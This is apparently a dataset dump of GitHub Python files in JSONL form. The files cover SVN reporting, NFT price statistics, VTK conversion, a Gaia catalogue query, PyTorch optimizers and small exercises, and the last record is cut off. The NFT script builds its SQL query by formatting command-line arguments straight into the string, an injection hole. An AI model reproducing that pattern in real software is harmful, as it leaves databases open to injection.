\"doc\": doc})\n        )\n        handle_error(response)\n","repo_name":"bluesky/databroker","sub_path":"databroker/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":10956,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"37"}
+{"seq_id":"18926098442","text":"# This routine is used to create SVN report of different paths in svn.cfg file.\n# Author: Rupinder Singh\n# Last Reviewed: August 4, 2017\n\nimport imp\nimport os\nimport time\n#IMPORTANT: svn.cfg should be in same path as this script (svn_enforcer.py)\ncfg_pth = os.path.dirname(os.path.abspath(__file__)) \n#IMPORTANT: pLib directory should exist in same path as svn_enforcer directory \npth_lib = os.path.dirname(cfg_pth)+'/pLib/' \nrsvn = imp.load_source('rs_svn',pth_lib+'rs_svn.py')\nrss = imp.load_source('rs_scraper',pth_lib+'rs_scraper.py')\nrsql = imp.load_source('rs_mysql',pth_lib+'rs_mysql.py')\n\nif __name__ == '__main__':\n\n    #Make sure svn.cfg exists (see README for details)\n    cfg_fn = \"/svn.cfg\" \n    cfg = rsql.load_config_file(cfg_pth+cfg_fn)\n    pth_key = 
'path' #key used in cfg for path\n    email_key = 'email' #key used in cfg for emails\n    \n    #EMAIL Details\n    HOSTNAME = rss.get_hostname()\n    eFrom = \"svn_enforcer@\"+HOSTNAME\n\n    try:\n        for key in cfg:\n            #\n            svn_pth = cfg[key][pth_key]\n            eTo = cfg[key][email_key]\n            \n            #CREATE HTML FOR EMAIL:\n            eHTML = \"\" \n            eHTML += \"<html><body>\"\n\n            eSubject = \"SVN ENFORCER: \"+key+'@'+HOSTNAME\n\n            eHTML += \"<br><br><b>1) SVN INFO (\"+time.strftime(\"%c\")+\")</b><br><br>\"\n            out,err = rsvn.svn_info(svn_pth)\n            eHTML += out.replace('\\n', '<br>')+'<br>'+err\n\n            eHTML += \"<br><br><b>2) SVN CLEANUP (\"+time.strftime(\"%c\")+\")</b><br><br>\"\n            out,err = rsvn.svn_cleanup(svn_pth)\n            eHTML += out.replace('\\n', '<br>')+'<br>'+err\n\n            eHTML += \"<br><br><b>3) SVN UPDATE (\"+time.strftime(\"%c\")+\")</b><br><br>\"\n            out,err = rsvn.svn_update(svn_pth)\n            eHTML += out.replace('\\n', '<br>')+'<br>'+err\n\n            eHTML += \"<br><br><b>4) SVN RESOLVE (\"+time.strftime(\"%c\")+\")</b><br><br>\"\n            out,err = rsvn.svn_resolve(svn_pth) #adding as fail-safe if update doesn't accept conflict via theirs-full option\n            eHTML += out.replace('\\n', '<br>')+'<br>'+err\n\n            eHTML += \"<br><br><b>5) SVN STATUS (\"+time.strftime(\"%c\")+\")</b><br><br>\"\n            out,err = rsvn.svn_status(svn_pth)\n            eHTML += out.replace('\\n', '<br>')+'<br>'+err\n\n            eHTML += \"<br><br><b>6) SVN DIFF (\"+time.strftime(\"%c\")+\")</b><br><br>\"\n            out,err = rsvn.svn_diff(svn_pth)\n            eHTML += \"Please see attachment (svn_diff.log)\"\n            eFiles = [svn_pth.replace('\\ ',' ').replace(\" \",\"\\ \")+'/svn_diff.log']\n            with open(eFiles[0], 'wb') as f:\n                f.write(out)\n\n            eHTML += \"<br><br><b>7) SVN RECENT COMMIT PER FILE (\"+time.strftime(\"%c\")+\")</b><br><br>\"\n            df = rsvn.svn_commit_per_file(svn_pth)\n            eHTML += df.to_html(justify='left')\n\n            eHTML += \"<br><br><b>8) SVN LOG STATS (\"+time.strftime(\"%c\")+\")</b><br><br>\"\n            df = rsvn.svn_log_stats(svn_pth)\n            eHTML += df.to_html(justify='left')\n\n            eHTML += \"<br><br><b>Finished! (\"+time.strftime(\"%c\")+\")</b><br><br>\"\n            eHTML += \"</body></html>\" \n            \n            #SEND EMAIL\n            rss.send_email(eFrom, eTo, eSubject, eHTML, FILES = eFiles)\n    except:\n        if 'eHTML' not in locals():\n            #CREATE HTML FOR EMAIL:\n            eHTML = \"\" \n            eHTML += \"<html><body>\"\n        eTo = 'YOUR_EMAIL_HERE@HOST.COM' #enter default email for errors\n        eSubject = \"SVN ENFORCER: \"+HOSTNAME+\" (FAILED!)\"\n        eHTML += \"<br><br><b>Process Failed! (\"+time.strftime(\"%c\")+\")</b><br><br>\"\n        eHTML += \"</body></html>\" \n        \n        #SEND EMAIL\n        rss.send_email(eFrom,eTo,eSubject,eHTML)\n","repo_name":"rupndrsingh/svn-enforcer","sub_path":"svn_enforcer/svn_enforcer.py","file_name":"svn_enforcer.py","file_ext":"py","file_size_in_byte":3620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"70696165228","text":"import sys, mysql.connector\nfrom tabulate import tabulate\n\nif __name__ == '__main__':\n    if len(sys.argv) < 3 :\n        print(\"Please give the name of NFT collections you want to trace and date range\")\n        exit()\n    mydb = mysql.connector.connect(\n        host=\"localhost\",\n        user=\"root\",\n        database=\"dApp\"\n    )\n    collection = sys.argv[1]\n    date_type = sys.argv[2]\n    cursor = mydb.cursor()\n    cursor.execute(\"SELECT DATE_FORMAT(date_trunc('{}', load_time), '%Y-%m-%d') AS {}, AVG(floor_price) AS average_price, STDDEV(floor_price) AS standard_deviation FROM {} GROUP BY DATE_FORMAT(date_trunc('{}', load_time), '%Y-%m-%d') LIMIT 2;\".format(date_type, date_type, collection, date_type))\n\n    results = cursor.fetchall()\n\n    print(tabulate(results, headers=[date_type, 'average_price', 'standard_deviation'], tablefmt='psql'))\n","repo_name":"yueyue1009/NFT_floor_price_stats","sub_path":"get_result.py","file_name":"get_result.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"14020536437","text":"#!/usr/bin/env python\n\nimport sys\nimport out2\nimport numpy as np\n\nN = 15 # number of macroscopic variables\n_, keifile, mfile, vtkfile = sys.argv\n\ndef gmshTypeToVTKType(gmshtype):\n    VTKTypes = [-1, -1, -1, -1, 10, 12, 13]\n    return VTKTypes[gmshtype]\n\ndef listToStr(elm):\n    return str(len(elm)) + ' ' + ' '.join( map(str, elm) )\n\ndef list3ToStr(l):\n    return ' '.join( map(str, l) )\n\ndef toVec(data, pos):\n    return map(list, zip(*data[pos : pos + 3]))\n\ndef writeScalar(name, data, pos):\n    for i, scalars in enumerate(data[pos::N]):\n        fd.writelines(\"SCALARS \" + name + \"%d float\\n\" % i)\n        fd.writelines(\"LOOKUP_TABLE default\\n\")\n        for scalar in scalars:\n            fd.writelines(str(scalar) + '\\n')\n\ndef writeVector(name, data, pos):\n    for i, vectors_x in enumerate(data[pos::N]):\n        vectors = toVec(data, pos+i*N)\n        fd.writelines(\"VECTORS \" + name + \"%d float\\n\" % i)\n        for vector in vectors:\n            fd.writelines(list3ToStr(vector) + '\\n')\n\nnodes, cells = out2.readNodesCells(keifile)\ndata = out2.readMacros(mfile, len(cells))\n\ncenternodes = []\nfor cell in cells:\n    centernode = np.zeros(3)\n    for vertex in cell.nodes:\n        centernode += nodes[vertex]\n    centernodes.append(centernode / len(cell.nodes))\n\nwith open(vtkfile, \"w\") as fd:\n    fd.writelines(\"# vtk DataFile Version 2.0\\n\")\n    fd.writelines(\"Velocity, MassFlux, HeatFlux, EnergyFlux.\\n\") \n    fd.writelines(\"ASCII\\n\")\n    fd.writelines(\"DATASET UNSTRUCTURED_GRID\\n\")\n\n    fd.writelines(\"POINTS %d float\\n\" % (len(nodes)+len(centernodes)) )\n    for node in nodes:\n        fd.writelines(\"%f %f %f\\n\" % (node[0], node[1], node[2]) )\n\n    for centernode in centernodes:\n        fd.writelines(\"%f %f %f\\n\" % (centernode[0], centernode[1], centernode[2]) )\n\n    fd.writelines(\"CELLS %d %d\\n\" % ( len(cells), sum( [len(cell.nodes)+1 for cell in cells] ) ))\n    for cell in cells:\n        fd.writelines(listToStr(cell.nodes) + '\\n')\n\n    fd.writelines(\"CELL_TYPES %d\\n\" % len(cells))\n    for cell in cells:\n        fd.writelines(str(gmshTypeToVTKType(cell.type)) + '\\n')\n\n    fd.writelines(\"CELL_DATA %d\\n\" % len(cells))\n\n    
writeScalar('Density', data, 0)\n writeVector('Velocity', data, 1)\n writeScalar('Temperature', data, 4)\n writeVector('Temperatures', data, 5)\n writeVector('HeatFlux', data, 8)\n writeVector('ShearStress', data, 11)\n writeScalar('H-function', data, 14)\n","repo_name":"olegrog/kesolver","sub_path":"tools/out2vtk.py","file_name":"out2vtk.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21486432308","text":"\"\"\"Problema 4 - RECURSIVA\"\"\"\n\"\"\"Encontrar o maior valor de uma lista\"\"\"\n\ntam = int(input(\"Digite o tamanho da lista: \"))\nlista = []\nfor i in range(tam):\n num = int(input(\"Digite um numero para a lista: \"))\n lista.append(num)\n\n\ndef maiorinteiro_aux(L, n):\n if n == 1:\n return L[0]\n else:\n m = maiorinteiro_aux(L, n - 1)\n if m > L[n - 1]:\n return m\n else:\n return L[n - 1]\n\n\ndef maiorinteiro(L):\n n = len(L)\n return maiorinteiro_aux(L, n)\n\n\nprint(\"O maior valor da lista L =\", lista, \"eh\", maiorinteiro(lista))\n","repo_name":"Gui-FernandesBR/MAC2166-2018","sub_path":"examples/6_recursive/problem4.py","file_name":"problem4.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5965982510","text":"import Funcs as f\r\nimport pandas as pd\r\n\r\n############# Controller ###############\r\nSITE = 1\r\n# LOCATIONCAPACITY = [7000, 6000] #scenario 1\r\nLOCATIONCAPACITY = [496836, 426576] #scenario 2\r\nHAVE_DATA = True\r\nSCENARIO = 2\r\n\r\nprint(\"we are running the program on site {} with scenario {}\".format(str(SITE), str(SCENARIO)))\r\n################## Date preparation #######################\r\nif not HAVE_DATA:\r\n f.data_preporation(site=SITE)\r\n\r\nweeks, populations = f.read_data(site = SITE)\r\n\r\n\r\n################## Initial optimization (step 1 & 2) ######################\r\ndf, forbidden_weeks, objective = f.optimizer(\r\n populations, weeks, site= SITE, location_capacity = LOCATIONCAPACITY[SITE], scenario = SCENARIO)\r\n\r\ndf.to_csv('saved/initial_results_for_site_{}_scenario_{}.csv'.format(str(SITE), str(SCENARIO)))\r\nprint('the optimized data frame has been saved')\r\n\r\n\r\n######################### Parameter tuning ###########################\r\nresults = f.tuning(populations, weeks, LOCATIONCAPACITY[SITE], forbidden_weeks, df, objective, scenario = SCENARIO)\r\n\r\nprint('the objectives and the final forbidden dictionary are ')\r\nfor i in results.keys():\r\n print(i,':',results[i])\r\n\r\n\r\n######################## final data results ############################\r\n\r\nforbidden_weeks = results[min(list(results.keys()))]\r\n\r\ndf, objective = f.final(populations, weeks, LOCATIONCAPACITY[SITE], forbidden_weeks, SITE, SCENARIO)\r\ndf.to_csv('saved/final_results_for_site_{}_scenario_{}.csv'.format(str(SITE), str(SCENARIO)))\r\n\r\nprint('the objective is : ', objective)","repo_name":"esysss/syngenta_challenge","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71419374826","text":"\"\"\"Data source for AWS Elastic Block Storage (EBS) volumes.\"\"\"\nfrom typing import Dict, List\n\nfrom sqlalchemy import Boolean, DateTime, Integer\nfrom sqlalchemy.dialects.postgresql import ENUM, JSONB\n\nfrom pantomath.provider.aws import (\n AwsDataSource,\n DataSourceColumn,\n beautify_tags,\n 
data_sources,\n)\n\n\n@data_sources.register(\"aws_ebs_volumes\")\nclass AwsEbsVolumesDataSource(AwsDataSource):\n \"\"\"Data source for AWS Elastic Block Storage (EBS) volumes.\"\"\"\n\n columns = [\n DataSourceColumn(\n description=\"Information about the volume attachments\",\n hydrate=\"Attachments\",\n name=\"attachments\",\n type=JSONB,\n ),\n DataSourceColumn(\n description=\"The Availability Zone for the volume\",\n hydrate=\"AvailabilityZone\",\n name=\"availability_zone\",\n ),\n DataSourceColumn(\n description=\"Indicates whether the volume is encrypted\",\n hydrate=\"CreateTime\",\n name=\"create_time\",\n type=DateTime(timezone=True),\n ),\n DataSourceColumn(\n description=\"Indicates whether the volume is encrypted\",\n hydrate=\"Encrypted\",\n name=\"encrypted\",\n type=Boolean,\n ),\n DataSourceColumn(\n description=\"The number of I/O operations per second (IOPS). For gp3 , io1 , and io2 volumes, this represents the number of IOPS that are provisioned for the volume. For gp2 volumes, this represents the baseline performance of the volume and the rate at which the volume accumulates I/O credits for bursting\", # noqa: E501\n hydrate=\"Iops\",\n name=\"iops\",\n type=Integer,\n ),\n DataSourceColumn(\n description=\"Indicates whether Amazon EBS Multi-Attach is enabled\",\n hydrate=\"MultiAttachEnabled\",\n name=\"multi_attach_enabled\",\n type=Boolean,\n ),\n DataSourceColumn(\n description=\"The name the volume\",\n hydrate=\"Tags[?Key=='Name'] | [0].Value\",\n name=\"name\",\n ),\n DataSourceColumn(\n description=\"The size of the volume, in GiBs\",\n hydrate=\"Size\",\n name=\"size\",\n type=Integer,\n ),\n DataSourceColumn(\n description=\"The snapshot from which the volume was created, if applicable\", # noqa: E501\n hydrate=\"SnapshotId\",\n name=\"snapshot_id\",\n ),\n DataSourceColumn(\n description=\"The volume state\",\n hydrate=\"State\",\n name=\"state\",\n type=ENUM(\n \"available\",\n \"creating\",\n \"deleted\",\n \"deleting\",\n \"error\",\n \"in-use\",\n name=\"aws_ebs_volumes_state_enum\",\n ),\n ),\n DataSourceColumn(\n description=\"Any tags assigned to the volume\",\n hydrate=\"Tags\",\n index=True,\n name=\"tags\",\n transform=beautify_tags,\n type=JSONB,\n ),\n DataSourceColumn(\n hydrate=\"Throughput\",\n name=\"throughput\",\n type=Integer,\n description=\"The throughput that the volume supports, in MiB/s\",\n ),\n DataSourceColumn(\n description=\"The ID of the volume\",\n hydrate=\"VolumeId\",\n index=True,\n name=\"volume_id\",\n ),\n DataSourceColumn(\n description=\"The volume type\",\n hydrate=\"VolumeType\",\n index=True,\n name=\"volume_type\",\n type=ENUM(\n \"gp2\",\n \"gp3\",\n \"io1\",\n \"io2\",\n \"sc1\",\n \"st1\",\n \"standard\",\n name=\"aws_ebs_volumes_volume_type_enum\",\n ),\n ),\n ]\n\n enrich_config: Dict = {}\n\n excluded_default_columns: List[str] = []\n\n extract_config = {\n \"method_name\": \"describe_volumes\",\n \"results_filter\": \"Volumes[]\",\n \"service_name\": \"ec2\",\n }\n","repo_name":"jmfontaine/pantomath","sub_path":"src/pantomath/provider/aws/ebs/volumes.py","file_name":"volumes.py","file_ext":"py","file_size_in_byte":4151,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"39001727151","text":"from django.shortcuts import render\nfrom data_visualization.models import Donnee_capteur, Salle, Montage, Boitier, Climat_exterieur\n\n\ndef listeDepartement(departements):\n\n departementsUnique = []\n departementsUnique = list(dict.fromkeys(departements))\n\n 
return departementsUnique\n\n\ndef home(request):\n\n MontageActif = (Montage.objects.filter(actif=True))\n salles = []\n departements = []\n donnees = []\n noms_montage = []\n for x in MontageActif:\n derniere_donnee = Donnee_capteur.objects.filter(\n montage=x.id, donnee_aberrante=False).last()\n\n '''\n Cette condition permet d'éviter que le site plante quand on ajoute un nouveau dispositif\n qu'il est actif, mais qu'il n'a pas encore enregistré une donnée.\n '''\n if derniere_donnee != None:\n donnees.append(derniere_donnee)\n salle = Salle.objects.get(boitier__montage__pk=x.id)\n salles.append(salle)\n departements.append(Salle.objects.get(\n boitier__montage__pk=x.id).departement)\n noms_montage.append(x.nom_montage)\n\n liste = list(zip(donnees, salles, noms_montage))\n\n context = {\n 'salle_navbar': salles,\n 'departements': listeDepartement(departements),\n 'liste': liste,\n 'enviroCanada': [Climat_exterieur.objects.last()]\n }\n\n return render(request, 'monitoring/home.html', context)\n\n\ndef about(request):\n\n MontageActif = Montage.objects.filter(actif=True)\n salle_navbar = []\n donnees_navbar = []\n\n for x in MontageActif:\n donnees_navbar.append(\n Donnee_capteur.objects.filter(montage=x.id).last())\n salle_navbar.append(Salle.objects.get(boitier__montage=x.id))\n\n liste = list(zip(donnees_navbar, salle_navbar))\n\n context = {\n 'title': 'About',\n 'liste': liste,\n 'enviroCanada': [Climat_exterieur.objects.last()]\n }\n\n return render(request, 'monitoring/about.html', context)\n","repo_name":"ejomphe/MONITORING-POLY-CHUM","sub_path":"monitoring_web_app/monitoring/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5084065845","text":"\nimport os\nimport ast\nimport numpy as np\nfrom astropy.io import ascii\nfrom astropy.table import Table\nfrom uncertainties import ufloat\nfrom uncertainties import unumpy as unp\nfrom modules import getData, writeOut, makePlot\nfrom modules._version import __version__\n\n\ndef main():\n \"\"\"\n Explore data downloaded via the astroquery package.\n\n Vizier Gaia DR2 column names:\n http://vizier.u-strasbg.fr/viz-bin/VizieR-3?-source=I/345/gaia2\n\n About the negative parallaxes in Gaia DR2 data:\n https://astronomy.stackexchange.com/q/26250/354\n https://astronomy.stackexchange.com/q/26071/354\n\n \"\"\"\n print(\"\\n*******************\")\n print(\" GaiaQuery {}\".format(__version__))\n print(\"*******************\")\n\n read, DR, Gmax, babusiaux_filters, clusters = readInput()\n\n if DR == '2':\n # Gaia DR2\n cat = 'I/345/gaia2'\n rv_col = 'RV'\n elif DR == '3':\n # Gaia EDR3\n cat = 'I/350/gaiaedr3'\n rv_col = 'RVDR2'\n else:\n raise ValueError(\"DR value '{}' is not supported\".format(DR))\n\n # Define color names\n col1_n, col2_n, col3_n = 'BP-RP', 'BP-G', 'G-RP'\n\n for folders in ['input', 'output']:\n if not os.path.exists(folders):\n os.makedirs(folders)\n\n for clust in clusters:\n center, box_s = (clust['cent_ra'], clust['cent_dec']), clust['box_s']\n\n data = getData.main(\n cat, Gmax, clust['name'], center, box_s, read)\n\n N_old = len(data)\n print(\"{} data read, {} sources\".format(clust['name'], N_old))\n\n if babusiaux_filters:\n data = babusiaux_filt(data)\n print(\"Filters applied, {:.1f}% of data lost\".format(\n 100. - (len(data) * 100.) 
/ N_old))\n\n mag, e_mag = data['Gmag'], data['e_Gmag']\n col1, col2, col3 = data[col1_n], data[col2_n], data[col3_n]\n if read is False:\n print(\"Obtaining magnitudes/colors and their uncertainties\")\n e_col1, e_col2, e_col3 = uncertMags(\n DR, data, col1_n, col2_n, col3_n)\n\n print(\"Write output file in input/ folder\")\n writeOut.main(\n clust['name'], data, e_col1, e_col2, e_col3, col1_n, col2_n,\n col3_n)\n else:\n e_col1, e_col2 = data['e_' + col1_n], data['e_' + col2_n]\n\n print(\"Plotting\")\n makePlot.main(\n center, box_s, Gmax, babusiaux_filters,\n rv_col, clust['name'], data['RA_ICRS'],\n data['DE_ICRS'], mag, e_mag, col1, e_col1, col2, e_col2, col3,\n data['Plx'], data['pmRA'], data['e_pmRA'], data['pmDE'],\n data['e_pmDE'], data[rv_col], col1_n, col2_n, col3_n)\n\n print(\"\\nEnd\")\n\n\ndef babusiaux_filt(data):\n \"\"\"\n Babusiaux et al. (2018) HRD filters.\n \"\"\"\n m1 = (data['RPlx'] > 0.) # 10.\n m2 = (data['RFG'] > 50.)\n m3 = (data['RFBP'] > 20.) # 20.\n m4 = (data['RFRP'] > 20.) # 20.\n m5 = (data['E_BR_RP_'] > 1. + 0.015 * (data['BPmag'] - data['RPmag']) ** 2)\n # m6 = (data['Gmag'] < 1.e6)\n m6 = (data['E_BR_RP_'] < 1.3 + 0.06 * (data['BPmag'] - data['RPmag']) ** 2)\n m7 = (data['Nper'] > 8)\n m8 = (data['chi2AL'] / (data['NgAL'] - 5.) < 1.44 * np.clip(\n np.exp(-.4 * (data['Gmag'] - 19.5)), a_min=None, a_max=1.))\n mask = m1 & m2 & m3 & m4 & m5 & m6 & m7 & m8\n for i, m in enumerate([m1, m2, m3, m4, m5, m6, m7, m8]):\n print(\" m\" + str(i + 1) + \" removes {} sources\".format(\n len(data) - m.data.sum()))\n\n return data[mask]\n\n\ndef uncertMags(DR, data, col1_n, col2_n, col3_n):\n \"\"\"\n # Gaia DR2 zero points:\n\n https://gea.esac.esa.int/archive/documentation/GDR2/Data_processing/\n chap_cu5pho/sec_cu5pho_calibr/ssec_cu5pho_calibr_extern.html#Ch5.T2\n\n The G magnitude error:\n unp.std_devs(mag_d['G'])\n is equivalent to:\n np.sqrt((1.0857*(data['e_FG']/data['FG']))**2 + .0018**2)\n as defined in Eq 5.26 of the link above.\n\n These values are larger than the 'e_Gmag' column given by Vizier by up to\n ~0.002 for the brightest stars, and go to zero for the faintest. I don't\n really know why. 
I asked Vizier and their answer was:\n\n > The e_Gmag uncertainties in VizieR were added by the CDS and,\n > apparently, do not take into account the Vegamag corrections; we will\n > continue the investigation.\n >\n > In the meantime, ignoring the e_Gmag in VizieR and using the formula\n > given by Gaia DR2 seems to be the right solution.\"\n\n # Gaia EDR3 zero points:\n\n https://www.cosmos.esa.int/web/gaia/edr3-passbands\n\n \"\"\"\n # Zero points for the G,BP,RP magnitudes.\n if DR == '2':\n # Updated October 2017\n Zp_G = ufloat(25.6914396869, 0.0011309370)\n Zp_BP = ufloat(25.3488107670, 0.0004899854)\n Zp_RP = ufloat(24.7626744847, 0.0035071711)\n elif DR == '3':\n Zp_G = ufloat(25.6873668671, 0.0027553202)\n Zp_BP = ufloat(25.3385422158, 0.0027901700)\n Zp_RP = ufloat(24.7478955012, 0.0037793818)\n\n # Fluxes\n I_G = unp.uarray(data['FG'], data['e_FG'])\n I_BP = unp.uarray(data['FBP'], data['e_FBP'])\n I_RP = unp.uarray(data['FRP'], data['e_FRP'])\n\n # Magnitudes\n mag_d = {\n 'G': Zp_G + -2.5 * unp.log10(I_G),\n 'BP': Zp_BP + -2.5 * unp.log10(I_BP),\n 'RP': Zp_RP + -2.5 * unp.log10(I_RP)}\n\n # import matplotlib.pyplot as plt\n # Gmag_new = unp.nominal_values(mag_d['RP'])\n # plt.scatter(data['Gmag'], data['RPmag'] - Gmag_new, alpha=.5)\n # plt.ylabel(\"Gmag_CDS - Gmag_here\")\n # plt.xlabel(\"Gmag_CDS\")\n # plt.show()\n\n col11, col12 = col1_n.split('-')\n col21, col22 = col2_n.split('-')\n col31, col32 = col3_n.split('-')\n # Colors\n col1 = mag_d[col11] - mag_d[col12]\n col2 = mag_d[col21] - mag_d[col22]\n col3 = mag_d[col31] - mag_d[col32]\n\n # Uncertainties\n e_col1, e_col2, e_col3 = unp.std_devs(col1), unp.std_devs(col2),\\\n unp.std_devs(col3)\n\n return e_col1, e_col2, e_col3\n\n\ndef readInput():\n \"\"\"\n Read 'cluster_in.dat' data file.\n \"\"\"\n with open(\"clusters_in.dat\", 'r') as f:\n i = 0\n for line in f:\n if i != 1:\n if not line.startswith('#') and line != '\\n':\n params = line.split()\n i = 1\n else:\n data = ascii.read(f.read())\n\n read, DR, Gmax, babusiaux_filters = ast.literal_eval(params[0]),\\\n params[1], params[2], ast.literal_eval(params[3])\n\n clusters = Table(data, names=('name', 'cent_ra', 'cent_dec', 'box_s'))\n\n return read, DR, Gmax, babusiaux_filters, clusters\n\n\nif __name__ == '__main__':\n # To see available catalogs:\n # catalog_list = Vizier.find_catalogs('Pan-STARRS')\n # catalogs = Vizier.get_catalogs(catalog_list.keys())\n # print(catalogs)\n\n main()\n","repo_name":"Gabriel-p/GaiaQuery","sub_path":"GAIA_query.py","file_name":"GAIA_query.py","file_ext":"py","file_size_in_byte":6799,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"40798372778","text":"import torch\nfrom torch import optim\nfrom torch.optim import Optimizer\n\n__all__ = [\n \"build_optimizer\",\n]\n\noptimizers = [\n # \"Adadelta\",\n # \"Adagrad\",\n \"Adam\",\n \"AdamW\",\n # \"SparseAdam\",\n # \"Adamax\",\n # \"ASGD\",\n # \"LBFGS\",\n # \"NAdam\",\n # \"RAdam\",\n # \"RMSprop\",\n # \"Rprop\",\n \"SGD\",\n]\n\n\ndef assertion(\n optimizer_type: str,\n) -> None:\n assert optimizer_type in optimizers, \\\n f\"Unsupported optimizer type: {optimizer_type}\"\n\n\ndef build_optimizer(\n model: torch.nn.Module,\n config,\n) -> Optimizer:\n optimizer_type = config.OPTIMIZER.TYPE\n\n assertion(optimizer_type)\n\n if optimizer_type == \"Adam\":\n optimizer = Adam(model, config)\n\n elif optimizer_type == \"AdamW\":\n optimizer = AdamW(model, config)\n\n elif optimizer_type == \"SGD\":\n optimizer = 
SGD(model, config)\n\n    else:\n        raise\n\n    return optimizer\n\n\ndef Adam(\n    model: torch.nn.Module,\n    config,\n) -> Optimizer:\n    \"\"\"\n    in config.yaml:\n    ⋮\n    LR: float\n    ⋮\n    OPTIMIZER:\n        TYPE: Adam\n        WEIGHT_DECAY: float\n    ⋮\n    \"\"\"\n    return optim.Adam(\n        model.parameters(),\n        lr=config.LR,\n        betas=(0.9, 0.999),\n        eps=1e-08,\n        weight_decay=config.OPTIMIZER.WEIGHT_DECAY,\n        amsgrad=False,\n    )\n\n\ndef AdamW(\n    model: torch.nn.Module,\n    config,\n) -> Optimizer:\n    \"\"\"\n    in config.yaml:\n    ⋮\n    LR: float\n    ⋮\n    OPTIMIZER:\n        TYPE: AdamW\n        WEIGHT_DECAY: float\n    ⋮\n    \"\"\"\n    return optim.AdamW(\n        params=model.parameters(),\n        lr=config.LR,\n        betas=(0.9, 0.999),\n        eps=1e-08,\n        weight_decay=config.OPTIMIZER.WEIGHT_DECAY,\n        amsgrad=False,\n    )\n\n\ndef SGD(\n    model: torch.nn.Module,\n    config,\n) -> Optimizer:\n    \"\"\"\n    in config.yaml:\n    ⋮\n    LR: float\n    ⋮\n    OPTIMIZER:\n        TYPE: SGD\n        MOMENTUM: float\n        WEIGHT_DECAY: float\n    ⋮\n    \"\"\"\n    return optim.SGD(\n        params=model.parameters(),\n        lr=config.LR,\n        momentum=config.OPTIMIZER.MOMENTUM,\n        dampening=0,\n        weight_decay=config.OPTIMIZER.WEIGHT_DECAY,\n        nesterov=False,\n    )\n","repo_name":"yupeeee/YupTools","sub_path":"src/yuptools/train/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"26819798472","text":"import keras\nfrom vis.visualization import visualize_activation\nfrom vis.utils import utils\nimport matplotlib.pyplot as plot\n\nmodel = keras.models.load_model('mnist_model.h5')\nlayer_idx = utils.find_layer_idx(model, 'nome_exclusivo_05')\nmodel.layers[layer_idx].activation = keras.activations.linear\nmodel = utils.apply_modifications(model)\n\nfor Lp in range(-9, 11, 1):\n    for classe in range(0, 10): \n        plot.subplot(20,10,1+classe+10*(Lp+9))\n        filter_idx = classe\n        img = visualize_activation(model, layer_idx, filter_indices=filter_idx, input_range=(0., 1.), verbose=True, max_iter=1000, tv_weight=1., lp_norm_weight=float(Lp/10.0))\n        plot.imshow(img.squeeze(), cmap='seismic', interpolation='nearest')\n\n# adjusting the display size\nfig = plot.gcf()\nfig.set_size_inches(18, 18)\n# fig.savefig('test2png.png', dpi=100, forward=True)\nplot.show()\n","repo_name":"patrickctrf/IA353-EG453-Redes-Neurais","sub_path":"EFC3_IA353_1s2019/q1/q1b.py","file_name":"q1b.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"15940106918","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport my_utils as utils\n\ndef main(dir_path, sub_name):\n    # get all filenames in directory\n    filenames = utils.get_files_names(dir_path)\n\n    for filename in filenames:\n        new_filename = filename.replace(sub_name, \"\")\n        print(filename + \" --> \" + new_filename)\n        os.rename(\n            os.path.join(dir_path, filename),\n            os.path.join(dir_path, new_filename))\n\n# Expose functionality\ncommand = \"del-sub-name\"\narguments = [\"directory\", \"subname\"]\ndescription = \"Delete a filename substring for each file in a given directory\"\nmain_function = main","repo_name":"aliefhooghe/music-mgr","sub_path":"music-mgr-modules/del_sub_name.py","file_name":"del_sub_name.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"36825858789","text":"# def add(x,y):\n#     return x+y\n\n# minus = lambda x,y: x-y\n\n# def sub(x,y):\n#     return x-y\n\n# 
print(add(5,4))\n# print(minus(5,4))\n# print(sub(5,4))\n\nl = [[2,5],[4,2],[5,6]]\nl.sort(key=lambda x:x[1], reverse=0)\nprint(l)","repo_name":"surazkarn/Git-Learning","sub_path":"LambdaFunction.py","file_name":"LambdaFunction.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15920542710","text":"from enum import Enum\n\nclass RockPaperScissors(Enum):\n X = 1\n Y = 2\n Z = 3\n A = 1\n B = 2\n C = 3\n\n def __gt__(self, other):\n if (self == self.X or self == self.A) and (other == other.C or other == other.Z):\n return True\n elif (self == self.Z or self == self.C) and (other == other.Y or other == other.B):\n return True\n elif (self == self.B or self == self.Y) and (other == other.A or other == other.X):\n return True\n else:\n return False\n \n\n\nwith open(\"Day 2/StrategyGuide.txt\", 'r') as strategyGuide:\n finalScore = 0\n for line in strategyGuide:\n finalScore += RockPaperScissors[line[2]].value\n if RockPaperScissors[line[2]] > RockPaperScissors[line[0]]:\n finalScore += 6\n elif RockPaperScissors[line[2]].value == RockPaperScissors[line[0]].value:\n finalScore 